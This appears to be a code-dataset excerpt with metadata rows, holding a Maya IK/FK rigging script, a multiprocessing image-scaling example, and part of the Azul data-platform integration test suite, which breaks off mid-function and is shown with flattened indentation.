cmds.setAttr(sdkDriver, 0)
cmds.setDrivenKeyframe(ikSdkDriven, cd=sdkDriver, v=0, dv=0)
cmds.setDrivenKeyframe(fkSdkDriven, cd=sdkDriver, v=1, dv=0)
cmds.setAttr(sdkDriver, 1)
cmds.setDrivenKeyframe(ikSdkDriven, cd=sdkDriver, v=1, dv=1)
cmds.setDrivenKeyframe(fkSdkDriven, cd=sdkDriver, v=0, dv=1)
ikChainBuild(scaleController, selectChain)
fkControllerCreator(scaleController, selectChain)
def fkControllerCreator(fkSize, legOrArm):
orientController = cmds.optionMenu("UI_orientControllerMenu", q=1, v=1)
# Create controllers and group offsets
# Change rotation, color
for y in range(chainLen):
anim_group = cmds.group(em=1, n=ogChain[y] + "_fk_anim_grp")
fk_controller = cmds.circle(n=ogChain[y] + "_fk_anim")[0] # If not [0] it'll warn some stuff related to Maya underworld
# Set scale
cmds.scale(fkSize, fkSize, fkSize, fk_controller)
cmds.matchTransform(anim_group, ogChain[y])
cmds.delete(cmds.parentConstraint(ogChain[y], fk_controller))
cmds.parent(fk_controller, anim_group)
# Set controller orientation based on second axis
if orientController == "x": cmds.rotate(90,0,0, fk_controller)
if orientController == "y": cmds.rotate(0,90,0, fk_controller)
if orientController == "z": cmds.rotate(0,0,90, fk_controller)
# Freeze transform, delete history and set color
cmds.makeIdentity(fk_controller, a = 1, t = 1, r = 1, s = 0)
cmds.delete(fk_controller, ch = 1)
cmds.color(fk_controller, rgb=controllerColor)
# Set SDK visibility
sdkDriver = switcherLoc[0] + ".FKIK_Mode"
cmds.setAttr(sdkDriver, 1)
cmds.setDrivenKeyframe(ogChain[0] + "_fk_anim_grp.visibility", cd=sdkDriver, v=1, dv=0)
cmds.setAttr(sdkDriver, 0)
cmds.setDrivenKeyframe(ogChain[0] + "_fk_anim_grp.visibility", cd=sdkDriver, v=0, dv=1)
# Lock .t and .s attributes
#for x in ["X", "Y", "Z"]:
#cmds.setAttr(fk_controller + ".translate" + x, k=0, l=1)
#cmds.setAttr(fk_controller + ".scale" + x, k=0, l=1)
# Create ordered hierarchy
for x in reversed(range(chainLen)):
if x == 0:
continue
cmds.parent(ogChain[x] + "_fk_anim_grp", ogChain[x-1] + "_fk_anim")
# Set orientConstraint _anim controllers with _fk hierarchy
for x in range(chainLen):
cmds.parentConstraint(ogChain[x] + "_fk_anim", ogChain[x] + "_fk")
# If leg chain is selected delete toe controller, else not
if legOrArm == "Leg":
if x == (chainLen-1):
cmds.delete(ogChain[chainLen-1] + "_fk_anim_grp")
def ikChainBuild(scaleIK, HandleName):
masterIkHandle = cmds.ikHandle(sj=ogChain[0] + "_ik", ee=ogChain[2] + "_ik", sol="ikRPsolver", n=side + HandleName + "_ikHandle")
cmds.setAttr(masterIkHandle[0] + ".visibility", 0)
if HandleName == "Arm":
#print ("scaleController", scaleField_UI)
armIk(scaleIK, masterIkHandle, HandleName)
else:
#print ("scaleController", scaleField_UI)
legIK(scaleIK, masterIkHandle, HandleName)
def armIk(armIkScale, armikHandle, pvName):
ikHandJoint = cmds.joint(n=side + "hand_ik")
cmds.delete(cmds.parentConstraint(ogChain[2] + "_ik", ikHandJoint))
cmds.makeIdentity(ikHandJoint, a = 1, t = 1, r = 1, s = 0)
if side == "l_":
cmds.move(10,0,0, ikHandJoint, r=1, os=1)
else:
cmds.move(-10,0,0, ikHandJoint, r=1, os=1)
cmds.parent(ikHandJoint, ogChain[2] + "_ik")
handikHandle = cmds.ikHandle(sj=ogChain[2] + "_ik", ee=ikHandJoint, n=side + "hand_ikHandle", sol="ikSCsolver")
cmds.parent(handikHandle[0], armikHandle[0])
#create IK controller ---> CUBE
crvIkCube = cmds.curve(d=1, p=[(-0.5, 0.5, -0.5), (0.5, 0.5, -0.5), (0.5, 0.5, 0.5),
(-0.5, 0.5, 0.5), (-0.5, -0.5, 0.5), (-0.5, -0.5, -0.5),
(-0.5, 0.5, -0.5), (-0.5, 0.5, 0.5), (-0.5, -0.5, 0.5),
(0.5, -0.5, 0.5), (0.5, 0.5, 0.5), (0.5, 0.5, -0.5),
(0.5, -0.5, -0.5), (0.5, -0.5, 0.5), (0.5, -0.5, -0.5), (-0.5, -0.5, -0.5)],
k=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5], n=side + "hand_ik_anim" )
# Rename shape node
shapeList = cmds.listRelatives(crvIkCube, s = True)
cmds.rename(shapeList, crvIkCube + "Shape")
crvIkCubeGrp = cmds.group(n=crvIkCube + "_grp")
cmds.delete(cmds.parentConstraint(ogChain[2] + "_ik", crvIkCubeGrp))
cmds.color(crvIkCube, rgb=controllerColor)
cmds.scale(armIkScale, armIkScale, armIkScale, crvIkCubeGrp)
cmds.parent(armikHandle[0], crvIkCube)
pvController = createSphere(nome= side+pvName+"_PV")
findPoleVector(loc=pvController, targetHandle=armikHandle[0])
cmds.addAttr(pvController, at="enum", enumName = "------", ln="Attributes", k=1, r=1)
cmds.addAttr(pvController, ln="Follow", k=1, r=1, min=0, max=1)
cmds.addAttr(pvController, ln="Follow_Clav_Hand", k=1, r=1, min=0, max=1, dv=0.5)
# Parent ikController and PV under _rig_GRP
cmds.parent(crvIkCubeGrp, pvController + "_grp" ,rigGrp)
#set SDK visibility
sdkDriver = switcherLoc[0] + ".FKIK_Mode"
cmds.setAttr(sdkDriver, 0)
cmds.setDrivenKeyframe(crvIkCubeGrp + ".visibility", cd=sdkDriver, v=0, dv=0)
cmds.setDrivenKeyframe(pvController + "_grp.visibility", cd=sdkDriver, v=0, dv=0)
cmds.setAttr(sdkDriver, 1)
cmds.setDrivenKeyframe(crvIkCubeGrp + ".visibility", cd=sdkDriver, v=1, dv=1)
cmds.setDrivenKeyframe(pvController + "_grp.visibility", cd=sdkDriver, v=1, dv=1)
def legIK(ikFootScale, legikHandle, pvName):
ballikHandle = cmds.ikHandle(sj=ogChain[2] + "_ik", ee=ogChain[3] + "_ik", sol="ikSCsolver", n=side + "ball_ikHandle")
toeikHandle = cmds.ikHandle(sj=ogChain[3] + "_ik", ee=ogChain[4] + "_ik", sol="ikSCsolver", n=side + "toe_ikHandle")
# Create and place ik controller
ikFootControl = cmds.curve(d=2, p=[(0.997, 0, 1.789), (0, 0, 2.39), (-0.997,0,1.789), (-1.108, 0, 0), (-0.784, 0,-2.5),
(0, 0,-3), (0.784, 0, -2.5), (1.108, 0, 0), (0.997, 0, 1.789), (0, 0, 2.39)],
k=[0,1,2,3,4,5,6,7,8,9,10], n=side + "leg_anim_ik")
# Rename shape node
shapeList = cmds.listRelatives(ikFootControl, s = True)
cmds.rename(shapeList, ikFootControl + "Shape")
ikFootControlGrp = cmds.group(em=1, n=ikFootControl + "_grp")
cmds.parent(ikFootControl, ikFootControlGrp)
# Set size, freeze transform, create offset group and color
cmds.scale(ikFootScale, ikFootScale, ikFootScale, ikFootControlGrp)
cmds.move(0,-3.2,0, ikFootControl, r=1)
cmds.makeIdentity(ikFootControl, a = 1, t = 1, r = 1, s = 1)
cmds.delete(ikFootControl, ch = 1)
cmds.delete(cmds.pointConstraint(ogChain[3] + "_ik", ikFootControlGrp))
cmds.color(ikFootControl, rgb=controllerColor)
# pivot snapping on ankle joint
piv = cmds.xform(ogChain[2], q=True, ws=True, t=True)
cmds.xform(ikFootControl, ws=True, piv=piv)
cmds.parent(ballikHandle[0], toeikHandle[0], legikHandle[0], ikFootControl)
#---------- Making Pole Vector -------------#
# Pole Vector controller ---> Sphere
pvController = createSphere(nome= side+pvName+"_PV")
findPoleVector(loc=pvController, targetHandle=legikHandle[0])
cmds.addAttr(pvController, ln="Follow", k=1, r=1, min=0, max=1)
cmds.addAttr(pvController, ln="Follow_Leg_Foot", k=1, r=1, min=0, max=1, dv=0.5)
# Create attributes on ikController
cmds.addAttr(ikFootControl, at="enum",enumName = "------", ln="Attributes", k=1, r=1)
cmds.addAttr(ikFootControl, ln="Twist", k=1, r=1)
cmds.addAttr(ikFootControl, ln="Lateral_Roll", k=1, r=1)
for bone in ["Ankle", "Ball", "Toe_Tap"]:
cmds.addAttr(ikFootControl, at="enum", enumName = "------", ln=bone, k=1, r=1)
for coord in ["X", "Y", "Z"]:
cmds.addAttr(ikFootControl, ln=bone+coord, k=1, r=1)
# Parent ikController and PV under _rig_GRP
cmds.parent(ikFootControlGrp, pvController + "_grp" ,rigGrp)
# Set SDK visibility
sdkDriver = switcherLoc[0] + ".FKIK_Mode"
cmds.setAttr(sdkDriver, 0)
cmds.setDrivenKeyframe(ikFootControlGrp + ".visibility", cd=sdkDriver, v=0, dv=0)
cmds.setDrivenKeyframe(pvController + "_grp.visibility", cd=sdkDriver, v=0, dv=0)
cmds.setAttr(sdkDriver, 1)
cmds.setDrivenKeyframe(ikFootControlGrp + ".visibility", cd=sdkDriver, v=1, dv=1)
cmds.setDrivenKeyframe(pvController + "_grp.visibility", cd=sdkDriver, v=1, dv=1)
def findPoleVector(loc, targetHandle):
# This func is kinda black magic
# All credits to https://vimeo.com/66015036
start = cmds.xform(ogChain[0], q=1, ws=1, t=1)
mid = cmds.xform(ogChain[1], q=1, ws=1, t=1)
end = cmds.xform(ogChain[2], q=1, ws=1, t=1)
startV = om.MVector(start[0], start[1], start[2])
midV = om.MVector(mid[0], mid[1], mid[2])
endV = om.MVector(end[0], end[1], end[2])
startEnd = endV - startV
startMid = midV - startV
dotP = startMid * startEnd
proj = float(dotP) / float(startEnd.length())
startEndN = startEnd.normal()
projV = startEndN * proj
arrowV = startMid - projV
arrowV*= 10 #distance from joint
finalV = arrowV + midV
cmds.xform(loc, ws=1, t=(finalV.x, finalV.y ,finalV.z))
locGrp = cmds.group(em=1, n=loc + "_grp")
#snap, parent offsetGrp, set color and then make Constraint
cmds.delete(cmds.pointConstraint(loc, locGrp))
cmds.parent(loc, locGrp)
cmds.makeIdentity(loc, a=1, t=1, r=1, s=1)
cmds.color(loc, rgb=controllerColor)
cmds.poleVectorConstraint(loc, targetHandle)
def showUI():
global chainMenu_UI
global scaleField_UI
global orientControllerMenu
global constraintCheckBox_UI
global blendCheckbox_UI
global plusOne_UI
global plusThree_UI
global clavCheckbox_UI
if cmds.window("switchModeUI", ex = 1): cmds.deleteUI("switchModeUI")
myWin = cmds.window("switchModeUI", t="IKFK Builder", w=300, h=300, s=1)
mainLayout = cmds.formLayout(nd=50)
# Useful in selecting which chain: Leg or Arm?
chainMenu_UI = cmds.optionMenu("chainMenu_UI", l="Which chain?", cc=visCheck)
cmds.menuItem(l="Leg")
cmds.menuItem(l="Arm")
constraintCheckBox_UI = cmds.checkBox(label = "orientConsts+SDK Mode", v=0,
cc= lambda state: (cmds.checkBox(blendCheckbox_UI, e=1, en=state-1)))
blendCheckbox_UI = cmds.checkBox(label = "blendColor Mode", v=0,
cc= lambda state: (cmds.checkBox(constraintCheckBox_UI, e=1, en=state-1)))
clavCheckbox_UI = cmds.checkBox(l="Clavicle", vis=0)
# Useful in orienting FK controllers as the user wishes. Maybe this can be improved
orientControllerMenu = cmds.optionMenu("UI_orientControllerMenu", l="What's the secondary axis")
cmds.menuItem(l="x")
cmds.menuItem(l="y")
cmds.menuItem(l="z")
# Scale the UI becase you'll never know
scaleControllerText = cmds.text(l="Controllers size")
scaleField_UI = cmds.intField(en=10, v=1, min=1)
plusOne_UI = cmds.button(l="+1", c=addOneUnit)
plusThree_UI = cmds.button(l="+3", c=addThreeUnit)
separator01 = cmds.separator(h=5)
separator02 = cmds.separator(h=5)
#
execButton = cmds.button(l="Duplicate Chain", c=partial(duplicateChain, blendNodeFunc, constraintFunc))
cmds.formLayout(mainLayout, e=1,
attachForm = [
(chainMenu_UI, "left", 8), (chainMenu_UI, "top", 5), (chainMenu_UI, "right", 80),
(clavCheckbox_UI, "top", 7),
(blendCheckbox_UI, "left", 5),
(separator01, "left", 1), (separator01, "right", 2),
#--------------------
(scaleField_UI, "right", 65), (scaleField_UI, "left", 5),
(plusOne_UI, "right", 5),
(plusThree_UI, "right", 5),
(scaleControllerText, "left", 5),
(separator02, "left", 1), (separator02, "right", 2),
#--------------------
(orientControllerMenu, "left", 8), (orientControllerMenu, "top", 5),
#--------------------
(execButton, "bottom", 5), (execButton, "left", 5), (execButton, "right", 5),
],
attachControl = [(clavCheckbox_UI, "left", 10, chainMenu_UI),
(constraintCheckBox_UI, "top", 5, chainMenu_UI),
(blendCheckbox_UI, "top", 5, chainMenu_UI),
(separator01, "top", 5, constraintCheckBox_UI),
(scaleField_UI, "top", 5, separator01),
(scaleControllerText, "top", 8, separator01),
(plusOne_UI, "top", 4, separator01),
(plusThree_UI, "top", 4, separator01),
(separator02, "top", 6, scaleField_UI),
(orientControllerMenu, "top", 6, separator02),
],
attachPosition = [#(clavCheckbox_UI, "right", 0, 10),
(constraintCheckBox_UI, "left", 0, 26), (blendCheckbox_UI, "right", 10, 24),
(scaleControllerText, "left", 5, 0), (scaleField_UI, "left", 110, 0), #(scaleField_UI, "right",0, 40),
(plusOne_UI, "right", 0, 45),
(plusThree_UI, "right", 0, 49)
]
)
cmds.showWindow(myWin)
showUI() | 41.386275 | 140 | 0.607713 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,224 | 0.200123 |
6a1cf3b76d95e590eb1efa6bc9673c121f9d7242 | 5,128 | py | Python | pipng/imagescale-q-m.py | nwiizo/joke | 808c4c998cc7f5b7f6f3fb5a3ce421588a70c087 | [
"MIT"
] | 1 | 2017-01-11T06:12:24.000Z | 2017-01-11T06:12:24.000Z | pipng/imagescale-q-m.py | ShuyaMotouchi/joke | 808c4c998cc7f5b7f6f3fb5a3ce421588a70c087 | [
"MIT"
] | null | null | null | pipng/imagescale-q-m.py | ShuyaMotouchi/joke | 808c4c998cc7f5b7f6f3fb5a3ce421588a70c087 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright © 2012-13 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version. It is provided for
# educational purposes and is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
import argparse
import collections
import math
import multiprocessing
import os
import sys
import Image
import Qtrac
Result = collections.namedtuple("Result", "copied scaled name")
Summary = collections.namedtuple("Summary", "todo copied scaled canceled")
def main():
size, smooth, source, target, concurrency = handle_commandline()
Qtrac.report("starting...")
summary = scale(size, smooth, source, target, concurrency)
summarize(summary, concurrency)
def handle_commandline():
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--concurrency", type=int,
default=multiprocessing.cpu_count(),
help="specify the concurrency (for debugging and "
"timing) [default: %(default)d]")
parser.add_argument("-s", "--size", default=400, type=int,
help="make a scaled image that fits the given dimension "
"[default: %(default)d]")
parser.add_argument("-S", "--smooth", action="store_true",
help="use smooth scaling (slow but good for text)")
parser.add_argument("source",
help="the directory containing the original .xpm images")
parser.add_argument("target",
help="the directory for the scaled .xpm images")
args = parser.parse_args()
source = os.path.abspath(args.source)
target = os.path.abspath(args.target)
if source == target:
args.error("source and target must be different")
if not os.path.exists(args.target):
os.makedirs(target)
return args.size, args.smooth, source, target, args.concurrency
def scale(size, smooth, source, target, concurrency):
canceled = False
jobs = multiprocessing.JoinableQueue()
results = multiprocessing.Queue()
create_processes(size, smooth, jobs, results, concurrency)
todo = add_jobs(source, target, jobs)
try:
jobs.join()
except KeyboardInterrupt: # May not work on Windows
Qtrac.report("canceling...")
canceled = True
copied = scaled = 0
while not results.empty(): # Safe because all jobs have finished
result = results.get_nowait()
copied += result.copied
scaled += result.scaled
return Summary(todo, copied, scaled, canceled)
def create_processes(size, smooth, jobs, results, concurrency):
for _ in range(concurrency):
process = multiprocessing.Process(target=worker, args=(size,
smooth, jobs, results))
process.daemon = True
process.start()
def worker(size, smooth, jobs, results):
while True:
try:
sourceImage, targetImage = jobs.get()
try:
result = scale_one(size, smooth, sourceImage, targetImage)
Qtrac.report("{} {}".format("copied" if result.copied else
"scaled", os.path.basename(result.name)))
results.put(result)
except Image.Error as err:
Qtrac.report(str(err), True)
finally:
jobs.task_done()
def add_jobs(source, target, jobs):
for todo, name in enumerate(os.listdir(source), start=1):
sourceImage = os.path.join(source, name)
targetImage = os.path.join(target, name)
jobs.put((sourceImage, targetImage))
return todo
def scale_one(size, smooth, sourceImage, targetImage):
oldImage = Image.from_file(sourceImage)
if oldImage.width <= size and oldImage.height <= size:
oldImage.save(targetImage)
return Result(1, 0, targetImage)
else:
if smooth:
scale = min(size / oldImage.width, size / oldImage.height)
newImage = oldImage.scale(scale)
else:
stride = int(math.ceil(max(oldImage.width / size,
oldImage.height / size)))
newImage = oldImage.subsample(stride)
newImage.save(targetImage)
return Result(0, 1, targetImage)
def summarize(summary, concurrency):
message = "copied {} scaled {} ".format(summary.copied, summary.scaled)
difference = summary.todo - (summary.copied + summary.scaled)
if difference:
message += "skipped {} ".format(difference)
message += "using {} processes".format(concurrency)
if summary.canceled:
message += " [canceled]"
Qtrac.report(message)
print()
if __name__ == "__main__":
main()
| 36.892086 | 76 | 0.63475 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,267 | 0.247027 |
6a1f0af3de00ce3a7fdb8765f1bbb9115dd67f60 | 35,122 | py | Python | test/integration_test.py | NoopDog/azul | 37614eff627888065c7b0a277b3137b8a587ed51 | [
"Apache-2.0"
] | null | null | null | test/integration_test.py | NoopDog/azul | 37614eff627888065c7b0a277b3137b8a587ed51 | [
"Apache-2.0"
] | null | null | null | test/integration_test.py | NoopDog/azul | 37614eff627888065c7b0a277b3137b8a587ed51 | [
"Apache-2.0"
] | null | null | null | from abc import (
ABCMeta,
)
from concurrent.futures.thread import (
ThreadPoolExecutor,
)
from contextlib import (
contextmanager,
)
import csv
from functools import (
lru_cache,
)
import gzip
from io import (
BytesIO,
TextIOWrapper,
)
import json
import logging
import os
import random
import re
import sys
import threading
import time
from typing import (
AbstractSet,
Any,
Dict,
IO,
List,
Mapping,
Optional,
Sequence,
Tuple,
cast,
)
import unittest
from unittest import (
mock,
)
import uuid
from zipfile import (
ZipFile,
)
import attr
import chalice.cli
from furl import (
furl,
)
from google.cloud import (
storage,
)
from google.oauth2 import (
service_account,
)
from hca.dss import (
DSSClient,
)
from hca.util import (
SwaggerAPIException,
)
from humancellatlas.data.metadata.helpers.dss import (
download_bundle_metadata,
)
from more_itertools import (
first,
one,
)
from openapi_spec_validator import (
validate_spec,
)
import requests
from azul import (
CatalogName,
cached_property,
config,
drs,
)
from azul.azulclient import (
AzulClient,
AzulClientNotificationError,
)
from azul.drs import (
AccessMethod,
)
import azul.dss
from azul.es import (
ESClientFactory,
)
from azul.indexer import (
BundleFQID,
)
from azul.indexer.index_service import (
IndexService,
)
from azul.logging import (
configure_test_logging,
)
from azul.modules import (
load_app_module,
)
from azul.portal_service import (
PortalService,
)
from azul.requests import (
requests_session_with_retry_after,
)
from azul.types import (
JSON,
)
from azul_test_case import (
AlwaysTearDownTestCase,
AzulTestCase,
)
log = logging.getLogger(__name__)
# noinspection PyPep8Naming
def setUpModule():
configure_test_logging(log)
class IntegrationTestCase(AzulTestCase, metaclass=ABCMeta):
bundle_uuid_prefix: str = ''
@cached_property
def azul_client(self):
return AzulClient(prefix=self.bundle_uuid_prefix)
class IndexingIntegrationTest(IntegrationTestCase, AlwaysTearDownTestCase):
prefix_length = 2
max_bundles = 64
min_timeout = 20 * 60
@classmethod
def setUpClass(cls) -> None:
super().setUpClass()
cls.bundle_uuid_prefix = ''.join([
str(random.choice('abcdef0123456789'))
for _ in range(cls.prefix_length)
])
def setUp(self) -> None:
super().setUp()
self.pruning_seed = random.randint(0, sys.maxsize)
@contextmanager
def subTest(self, msg: Any = None, **params: Any):
log.info('Beginning sub-test [%s] %r', msg, params)
with super().subTest(msg, **params):
try:
yield
except BaseException:
log.info('Failed sub-test [%s] %r', msg, params)
raise
else:
log.info('Successful sub-test [%s] %r', msg, params)
def test(self):
@attr.s(auto_attribs=True, kw_only=True)
class Catalog:
name: CatalogName
notifications: Mapping[BundleFQID, JSON]
@property
def num_bundles(self):
return len(self.notifications)
@property
def bundle_fqids(self) -> AbstractSet[BundleFQID]:
return self.notifications.keys()
def notifications_with_duplicates(self) -> List[JSON]:
num_duplicates = self.num_bundles // 2
notifications = list(self.notifications.values())
# Index some bundles again to test that we handle duplicate additions.
# Note: random.choices() may pick the same element multiple times so
# some notifications will end up being sent three or more times.
notifications.extend(random.choices(notifications, k=num_duplicates))
return notifications
def _wait_for_indexer():
num_bundles = sum(catalog.num_bundles for catalog in catalogs)
self.azul_client.wait_for_indexer(num_expected_bundles=num_bundles,
min_timeout=self.min_timeout)
# For faster modify-deploy-test cycles, set `delete` to False and run
# test once. Then also set `index` to False. Subsequent runs will use
# catalogs from first run. Don't commit changes to these two lines.
index = True
delete = True
if index:
self._reset_indexer()
catalogs: List[Catalog] = [
Catalog(name=catalog, notifications=self._prepare_notifications(catalog) if index else {})
for catalog in config.integration_test_catalogs
]
if index:
for catalog in catalogs:
log.info('Starting integration test for catalog %r with %i bundles from prefix %r.',
catalog, catalog.num_bundles, self.bundle_uuid_prefix)
self.azul_client.index(catalog=catalog.name,
notifications=catalog.notifications_with_duplicates())
_wait_for_indexer()
for catalog in catalogs:
self._assert_catalog_complete(catalog=catalog.name,
entity_type='files',
bundle_fqids=catalog.bundle_fqids)
for catalog in catalogs:
self._test_manifest(catalog.name)
self._test_dos_and_drs(catalog.name)
self._test_repository_files(catalog.name)
if index and delete:
for catalog in catalogs:
self.azul_client.index(catalog=catalog.name,
notifications=catalog.notifications_with_duplicates(),
delete=True)
_wait_for_indexer()
for catalog in catalogs:
self._assert_catalog_empty(catalog.name)
self._test_other_endpoints()
def _reset_indexer(self):
# While it's OK to erase the integration test catalog, the queues are
# shared by all catalogs and we can't afford to trash them in a stable
# deployment like production.
self.azul_client.reset_indexer(catalogs=config.integration_test_catalogs,
# Can't purge the queues in stable deployment as
# they may contain work for non-IT catalogs.
purge_queues=not config.is_stable_deployment(),
delete_indices=True,
create_indices=True)
def _test_other_endpoints(self):
service_paths = (
'/',
'/openapi',
'/version',
'/index/summary',
'/index/files/order',
)
service_routes = (
(config.service_endpoint(), path)
for path in service_paths
)
health_endpoints = (
config.service_endpoint(),
config.indexer_endpoint()
)
health_paths = (
'', # default keys for lambda
'/', # all keys
'/basic',
'/elasticsearch',
'/queues',
'/progress',
'/api_endpoints',
'/other_lambdas'
)
health_routes = (
(endpoint, '/health' + path)
for endpoint in health_endpoints
for path in health_paths
)
for endpoint, path in (*service_routes, *health_routes):
with self.subTest('other_endpoints', endpoint=endpoint, path=path):
self._check_endpoint(endpoint, path)
def _test_manifest(self, catalog: CatalogName):
for format_, validator, attempts in [
(None, self._check_manifest, 1),
('compact', self._check_manifest, 1),
('full', self._check_manifest, 3),
('terra.bdbag', self._check_terra_bdbag, 1)
]:
with self.subTest('manifest',
catalog=catalog,
format=format_,
attempts=attempts):
assert attempts > 0
params = dict(catalog=catalog)
if format_ is not None:
params['format'] = format_
for attempt in range(attempts):
start = time.time()
response = self._check_endpoint(config.service_endpoint(), '/manifest/files', params)
log.info('Request %i/%i took %.3fs to execute.', attempt + 1, attempts, time.time() - start)
validator(catalog, response)
@lru_cache(maxsize=None)
def _get_one_file_uuid(self, catalog: CatalogName) -> str:
filters = {'fileFormat': {'is': ['fastq.gz', 'fastq']}}
response = self._check_endpoint(endpoint=config.service_endpoint(),
path='/index/files',
query=dict(catalog=catalog,
filters=json.dumps(filters),
size=1,
order='asc',
sort='fileSize'))
hits = json.loads(response)
return one(one(hits['hits'])['files'])['uuid']
def _test_dos_and_drs(self, catalog: CatalogName):
if config.is_dss_enabled(catalog) and config.dss_direct_access:
file_uuid = self._get_one_file_uuid(catalog)
self._test_dos(catalog, file_uuid)
self._test_drs(catalog, file_uuid)
@cached_property
def _requests(self) -> requests.Session:
return requests_session_with_retry_after()
def _check_endpoint(self,
endpoint: str,
path: str,
query: Optional[Mapping[str, Any]] = None) -> bytes:
query = {} if query is None else {k: str(v) for k, v in query.items()}
url = furl(endpoint, path=path, query=query)
return self._get_url_content(url.url)
def _get_url_content(self, url: str) -> bytes:
return self._get_url(url).content
def _get_url(self, url: str, allow_redirects=True) -> requests.Response:
log.info('GET %s', url)
response = self._requests.get(url, allow_redirects=allow_redirects)
expected_statuses = (200,) if allow_redirects else (200, 301, 302)
self._assertResponseStatus(response, expected_statuses)
return response
def _assertResponseStatus(self,
response: requests.Response,
expected_statuses: Tuple[int, ...] = (200,)):
self.assertIn(response.status_code,
expected_statuses,
(response.reason, response.content))
def _check_manifest(self, _catalog: CatalogName, response: bytes):
self.__check_manifest(BytesIO(response), 'bundle_uuid')
def _check_terra_bdbag(self, catalog: CatalogName, response: bytes):
with ZipFile(BytesIO(response)) as zip_fh:
data_path = os.path.join(os.path.dirname(first(zip_fh.namelist())), 'data')
file_path = os.path.join(data_path, 'participants.tsv')
with zip_fh.open(file_path) as file:
rows = self.__check_manifest(file, 'bundle_uuid')
for row in rows:
# Terra doesn't allow colons in this column, but they may
# exist in versions indexed by TDR
self.assertNotIn(':', row['entity:participant_id'])
suffix = '__file_drs_uri'
header, *rows = rows
prefixes = [
c[:-len(suffix)]
for c in header.keys()
if c.endswith(suffix)
]
size, drs_uri, name = min(
(
int(row[prefix + '__file_size']),
row[prefix + suffix],
row[prefix + '__file_name'],
)
for row in rows
for prefix in prefixes
if row[prefix + suffix]
)
log.info('Resolving %r (%r) from catalog %r (%i bytes)',
drs_uri, name, catalog, size)
plugin = self.azul_client.repository_plugin(catalog)
drs_client = plugin.drs_client()
access = drs_client.get_object(drs_uri, access_method=AccessMethod.https)
self.assertIsNone(access.headers)
self.assertEqual('https', furl(access.url).scheme)
# Try HEAD first because it's more efficient, fall back to GET if the
# DRS implementations prohibits it, like Azul's DRS proxy of DSS.
for method in ('HEAD', 'GET'):
log.info('%s %s', method, access.url)
# For DSS, any HTTP client should do but for TDR we need to use an
# authenticated client. TDR does return a Bearer token in the `headers`
# part of the DRS response but we know that this token is the same as
# the one we're making the DRS request with.
response = drs_client.http_client.request(method, access.url)
if response.status != 403:
break
self.assertEqual(200, response.status, response.data)
self.assertEqual(size, int(response.headers['Content-Length']))
def __check_manifest(self, file: IO[bytes], uuid_field_name: str) -> List[Mapping[str, str]]:
text = TextIOWrapper(file)
reader = csv.DictReader(text, delimiter='\t')
rows = list(reader)
log.info(f'Manifest contains {len(rows)} rows.')
self.assertGreater(len(rows), 0)
self.assertIn(uuid_field_name, reader.fieldnames)
bundle_uuid = rows[0][uuid_field_name]
self.assertEqual(bundle_uuid, str(uuid.UUID(bundle_uuid)))
return rows
def _test_repository_files(self, catalog: str):
with self.subTest('repository_files', catalog=catalog):
file_uuid = self._get_one_file_uuid(catalog)
response = self._check_endpoint(endpoint=config.service_endpoint(),
path=f'/fetch/repository/files/{file_uuid}',
query=dict(catalog=catalog))
response = json.loads(response)
while response['Status'] != 302:
self.assertEqual(301, response['Status'])
response = self._get_url(response['Location']).json()
content = self._get_url_content(response['Location'])
self._validate_fastq_content(content)
def _test_drs(self, catalog: CatalogName, file_uuid: str):
repository_plugin = self.azul_client.repository_plugin(catalog)
drs = repository_plugin.drs_client()
for access_method in AccessMethod:
with self.subTest('drs', catalog=catalog, access_method=AccessMethod.https):
log.info('Resolving file %r with DRS using %r', file_uuid, access_method)
drs_uri = f'drs://{config.api_lambda_domain("service")}/{file_uuid}'
access = drs.get_object(drs_uri, access_method=access_method)
self.assertIsNone(access.headers)
if access.method is AccessMethod.https:
content = self._get_url_content(access.url)
elif access.method is AccessMethod.gs:
content = self._get_gs_url_content(access.url)
else:
self.fail(access_method)
self._validate_fastq_content(content)
def _test_dos(self, catalog: CatalogName, file_uuid: str):
with self.subTest('dos', catalog=catalog):
log.info('Resolving file %s with DOS', file_uuid)
response = self._check_endpoint(config.service_endpoint(),
path=drs.dos_object_url_path(file_uuid),
query=dict(catalog=catalog))
json_data = json.loads(response)['data_object']
file_url = first(json_data['urls'])['url']
while True:
response = self._get_url(file_url, allow_redirects=False)
# We handle redirects ourselves so we can log each request
if response.status_code in (301, 302):
file_url = response.headers['Location']
try:
retry_after = response.headers['Retry-After']
except KeyError:
pass
else:
time.sleep(int(retry_after))
else:
break
self._assertResponseStatus(response)
self._validate_fastq_content(response.content)
def _get_gs_url_content(self, url: str) -> bytes:
self.assertTrue(url.startswith('gs://'))
path = os.environ['GOOGLE_APPLICATION_CREDENTIALS']
credentials = service_account.Credentials.from_service_account_file(path)
storage_client = storage.Client(credentials=credentials)
content = BytesIO()
storage_client.download_blob_to_file(url, content)
return content.getvalue()
def _validate_fastq_content(self, content: bytes):
# Check signature of FASTQ file.
with gzip.open(BytesIO(content)) as buf:
fastq = buf.read(1024 * 1024)
lines = fastq.splitlines()
# Assert first character of first and third line of file (see https://en.wikipedia.org/wiki/FASTQ_format).
self.assertTrue(lines[0].startswith(b'@'))
self.assertTrue(lines[2].startswith(b'+'))
def _prepare_notifications(self, catalog: CatalogName) -> Dict[BundleFQID, JSON]:
bundle_fqids = self.azul_client.list_bundles(catalog)
bundle_fqids = self._prune_test_bundles(catalog, bundle_fqids, self.max_bundles)
return {
bundle_fqid: self.azul_client.synthesize_notification(catalog, bundle_fqid)
for bundle_fqid in bundle_fqids
}
def _prune_test_bundles(self,
catalog: CatalogName,
bundle_fqids: Sequence[BundleFQID],
max_bundles: int
) -> List[BundleFQID]:
seed = self.pruning_seed
log.info('Selecting %i bundles with projects, out of %i candidates, using random seed %i.',
max_bundles, len(bundle_fqids), seed)
random_ = random.Random(x=seed)
